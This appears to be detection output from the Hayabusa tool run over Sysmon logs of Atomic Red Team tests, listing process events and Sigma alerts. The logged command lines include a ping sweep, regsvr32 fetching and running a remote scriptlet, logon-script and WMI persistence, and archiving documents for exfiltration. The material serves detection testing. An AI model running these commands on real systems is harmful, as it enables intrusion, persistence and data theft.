+2019-07-19 23:53:34.556 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.240 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5024 | PGUID: 747F3D96-D96E-5D31-0000-00106E823700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:35.024 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.241 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2180 | PGUID: 747F3D96-D96F-5D31-0000-00105A853700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:35.559 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.242 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3556 | PGUID: 747F3D96-D96F-5D31-0000-0010C78F3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:36.025 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.243 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3788 | PGUID: 747F3D96-D970-5D31-0000-0010B4923700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:36.536 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.244 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7072 | PGUID: 747F3D96-D970-5D31-0000-0010A0953700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:37.012 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.245 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2700 | PGUID: 747F3D96-D971-5D31-0000-00108C983700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:37.505 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.246 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 352 | PGUID: 747F3D96-D971-5D31-0000-0010789B3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:38.043 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.247 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3120 | PGUID: 747F3D96-D972-5D31-0000-00106BA43700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:38.588 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.248 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6976 | PGUID: 747F3D96-D972-5D31-0000-001057A73700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:39.024 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.249 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2440 | PGUID: 747F3D96-D973-5D31-0000-0010A3AA3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:39.518 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.250 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5100 | PGUID: 747F3D96-D973-5D31-0000-00108FAD3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:40.006 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.251 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7144 | PGUID: 747F3D96-D974-5D31-0000-00107BB03700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:40.535 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.252 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5612 | PGUID: 747F3D96-D974-5D31-0000-001068B33700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:40.982 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.253 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 196 | PGUID: 747F3D96-D974-5D31-0000-001006BD3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:41.530 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.254 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1624 | PGUID: 747F3D96-D975-5D31-0000-001099C23700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:42.061 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6412 | PGUID: 747F3D96-D976-5D31-0000-00104AC63700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:42.276 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""arp -a"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6292 | PGUID: 747F3D96-D976-5D31-0000-0010DBCC3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:42.276 +09:00,MSEDGEWIN10,1,low,Disc,Suspicious Network Command,,rules/sigma/process_creation/proc_creation_win_susp_network_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:42.301 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: arp -a | Process: C:\Windows\System32\ARP.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""arp -a"" | LID: 0x50951 | PID: 1340 | PGUID: 747F3D96-D976-5D31-0000-001034CF3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:42.404 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6312 | PGUID: 747F3D96-D976-5D31-0000-0010D8D53700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:42.815 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4444 | PGUID: 747F3D96-D976-5D31-0000-001041E83700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll"" | LID: 0x50951 | PID: 2332 | PGUID: 747F3D96-D976-5D31-0000-001093EA3700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:42.841 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:43.445 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: regsvr32.exe /s /u /i:C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct scrobj.dll | LID: 0x50951 | PID: 3848 | PGUID: 747F3D96-D977-5D31-0000-00100A0E3800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:43.574 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1476 | PGUID: 747F3D96-D977-5D31-0000-0010771B3800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:44.026 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2832 | PGUID: 747F3D96-D978-5D31-0000-0010442F3800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll"" | LID: 0x50951 | PID: 2076 | PGUID: 747F3D96-D978-5D31-0000-0010EB313800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:44.054 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:45.157 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 6152 | PGUID: 747F3D96-D978-5D31-0000-00101E7A3800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:46.204 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll | LID: 0x50951 | PID: 4336 | PGUID: 747F3D96-D97A-5D31-0000-00105DA83800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:46.565 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7148 | PGUID: 747F3D96-D97A-5D31-0000-001089BD3800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:46.589 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49728 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\regsvr32.exe | PID: 2076 | PGUID: 747F3D96-D978-5D31-0000-0010EB313800,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:46.589 +09:00,MSEDGEWIN10,3,high,Exec | Evas,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:46.848 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\syswow64\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll | Process: C:\Windows\SysWOW64\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3564 | PGUID: 747F3D96-D97A-5D31-0000-00109DDC3800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:46.848 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:46.893 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll | Process: C:\Windows\System32\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5828 | PGUID: 747F3D96-D97A-5D31-0000-001019DE3800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:46.893 +09:00,MSEDGEWIN10,1,high,Evas,Regsvr32 Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:46.975 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c IF %%PROCESSOR_ARCHITECTURE%% ==AMD64 ELSE | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4628 | PGUID: 747F3D96-D97A-5D31-0000-00102BE33800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:47.083 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll | Process: C:\Windows\SysWOW64\regsvr32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\regsvr32.exe"" /s C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll | LID: 0x50951 | PID: 5788 | PGUID: 747F3D96-D97B-5D31-0000-00109DEB3800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:47.239 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6888 | PGUID: 747F3D96-D97B-5D31-0000-0010F0F03800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:54.976 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "" cmd.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4240 | PGUID: 747F3D96-D982-5D31-0000-0010DC633900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:54.976 +09:00,MSEDGEWIN10,1,high,Persis,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:55.018 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d cmd.exe | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""REG.exe ADD HKCU\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d "" cmd.exe | LID: 0x50951 | PID: 3608 | PGUID: 747F3D96-D983-5D31-0000-00102E663900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:53:55.018 +09:00,MSEDGEWIN10,1,high,Persis,Logon Scripts (UserInitMprLogonScript),,rules/sigma/process_creation/proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,high,Persis | LatMov,Logon Scripts (UserInitMprLogonScript) Registry,,rules/sigma/registry_event/sysmon_logon_scripts_userinitmprlogonscript_reg.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:54:01.925 +09:00,MSEDGEWIN10,13,medium,Persis,Common Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_common.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:54:01.955 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4944 | PGUID: 747F3D96-D989-5D31-0000-0010FC7B3900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:54:16.782 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""rar a -r exfilthis.rar *.docx"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2000 | PGUID: 747F3D96-D998-5D31-0000-001008B43900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:54:16.830 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2424 | PGUID: 747F3D96-D998-5D31-0000-00101BB73900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:54:57.044 +09:00,MSEDGEWIN10,19,info,,WMI Event Filter Activity,"Created | Namespace: ""root\\CimV2"" | Name: ""AtomicRedTeam-WMIPersistence-Example"" | Query: ""SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"" | User: MSEDGEWIN10\IEUser",rules/hayabusa/sysmon/events/19_WmiEventFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:54:58.819 +09:00,MSEDGEWIN10,20,info,,WMI Event Consumer Activity,"Created | Type: Command Line | Name: ""AtomicRedTeam-WMIPersistence-Example"" | Dst: ""C:\\Windows\\System32\\notepad.exe"" | User: MSEDGEWIN10\IEUser",rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
